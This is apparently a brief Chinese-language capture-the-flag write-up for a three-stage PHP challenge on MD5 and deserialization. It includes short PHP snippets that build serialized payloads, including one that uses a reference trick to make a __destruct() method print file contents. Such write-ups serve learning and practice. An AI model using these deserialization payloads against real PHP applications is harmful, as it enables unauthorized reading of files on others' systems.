一共有三小关
第一关:md5加密
![](https://file.jishuzhan.net/article/1790254079964876802/82e76f213f5391db0f55067adb001320.webp)
![](https://file.jishuzhan.net/article/1790254079964876802/f6017306fd4338a7d15e9a70a6c4c1de.webp)
第二关:反序列化
![](https://file.jishuzhan.net/article/1790254079964876802/4f1af434a6099b2f9ca747f662b425b4.webp)
重点 单个字符串序列化 unserialize($str) === "$KEY"
php
<?php
$KEY="YES I love";
echo serialize($KEY);
s:10:"YES I love";
第三关: 反序列化
![](https://file.jishuzhan.net/article/1790254079964876802/74aa4ef57479773235462870abe2fd8e.webp)
把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。
php
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);